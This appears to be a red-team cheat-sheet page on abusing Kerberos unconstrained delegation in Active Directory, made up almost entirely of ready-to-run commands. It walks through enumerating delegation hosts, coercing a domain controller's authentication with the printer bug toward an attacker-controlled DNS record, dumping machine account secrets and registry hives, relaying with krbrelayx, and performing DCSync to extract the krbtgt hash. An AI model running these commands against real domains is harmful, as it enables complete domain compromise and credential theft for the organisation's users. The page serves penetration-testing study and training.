Unconstrained

Enumerate:

PowerView3 > Get-DomainComputer -Unconstrained | select dnshostname,samaccountname,useraccountcontrol

Monitor for TGTs

Coerce authentication from a DC while monitoring for TGTs in the background on the owned unconstrained delegation system:

Cmd > .\Rubeus.exe monitor /targetuser:DC01$ /interval:5 /nowrap /runfor:60 [/registry:SOFTWARE\MONITOR] [/consoleoutfile:C:\Windows\Temp\monitor.txt]
Cmd > .\SpoolSample.exe dc01.megacorp.local srv01.megacorp.local

Use ticket_converter or ticketConverter.py to convert the TGT from .kirbi to .ccache (usable with impacket):

$ python ticket_converter.py dc01.kirbi dc01.ccache
$ KRB5CCNAME=`pwd`/dc01.ccache ...

If output goes to the /registry:

PS > Get-ChildItem HKLM:\SOFTWARE\MONITOR\
PS > Get-ItemProperty HKLM:\SOFTWARE\MONITOR\DC01$@MEGACORP.LOCAL
PS > Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force

"Relaying" Kerberos

Printer Bug + DCSync

Requirements:

  • Owned computer account with unconstrained delegation enabled (SRV01).

  • Printer bug on a domain controller (DC01).

  • Permissions to add an SPN for the owned computer account and a new DNS record in AD.

1. Grab owned computer account password to calculate its Kerberos AES key. This is done automatically when extracting the password remotely with secretsdump.py, or it will be done later by krbrelayx.py when providing it the password in hex from local secretsdump.py output:

 # Remotely
$ secretsdump.py MEGACORP/snovvcrash:'Passw0rd!'@SRV01.megacorp.local -ts
...
MEGACORP\SRV01$:aes256-cts-hmac-sha1-96:00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff

 # Locally
Cmd > reg.exe save hklm\system system.hive
Cmd > reg.exe save hklm\security security.hive
$ secretsdump.py -system system.hive -security security.hive LOCAL
...
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:<PLAIN_PASSWORD_HEX>

2. Add a malicious SPN for the owned computer account with unconstrained delegation:

 # Check (no modifications)
$ python addspn.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local -q DC01.megacorp.local
 # Adding servicePrincipalName that doesn't match full hostname or samAccountName will fail
$ python addspn.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local DC01.megacorp.local
 # But modifying msDS-AdditionalDnsHostName will succeed
$ python addspn.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local DC01.megacorp.local --additional

3. Add a DNS record pointing to the attacker's host:

$ python dnstool.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -r evil.megacorp.local -d <ATTACKER_IP> --action add DC01.megacorp.local

4. Check that the record was added successfully (~ 3 minutes):

$ nslookup evil.megacorp.local <DC01_IP>
Server:		192.168.1.11
Address:	192.168.1.11#53

Name:	evil.megacorp.local
Address: 10.10.13.37

5. Start krbrelayx.py providing AES key of the owned computer account or its plain password in hex with salt:

 # In case secretsdump.py was used remotely
$ sudo python krbrelayx.py -aesKey 00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff
 # In case secretsdump.py was used locally
$ sudo python krbrelayx.py --krbhexpass <PLAIN_PASSWORD_HEX> --krbsalt MEGACORP.LOCALhostsrv01.megacorp.local

6. Coerce the authentication to attacker's host from DC01 by triggering printer bug:

$ python printerbug.py megacorp.local/'SRV01$'@DC01.megacorp.local -hashes aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 evil.megacorp.local

7. Export extracted TGT and perform DCSync to get krbtgt hash (or any other privileged account hash):

$ export KRB5CCNAME=`pwd`/'DC01$@MEGACORP.LOCAL_krbtgt@MEGACORP.LOCAL.ccache'
$ secretsdump.py DC01.megacorp.local -dc-ip <DC01_IP> -just-dc-user 'MEGACORP\krbtgt' -k -no-pass

8. Cleanup. Delete SPN and DNS record:

$ python addspn.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local -r DC01.megacorp.local --additional
$ python dnstool.py -u 'megacorp.local\SRV01$' -p aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -r evil.megacorp.local -d <ATTACKER_IP> --action remove DC01.megacorp.local
 # Check if the SPN was deleted successfully
$ windapsearch --dc 192.168.1.11 -d megacorp.local -u 'SRV01$' --hash fc525c9683e8fe067095ba2ddc971889 -m computers --attrs servicePrincipalName | grep SRV01

Other scenarios:

  • In this blogpost it is described how to perform the attack by abusing a service (user) account with unconstrained delegation enabled.

  • In this blogpost it is described how to perform the attack from Windows by extracting TGT with Inveigh.

Last updated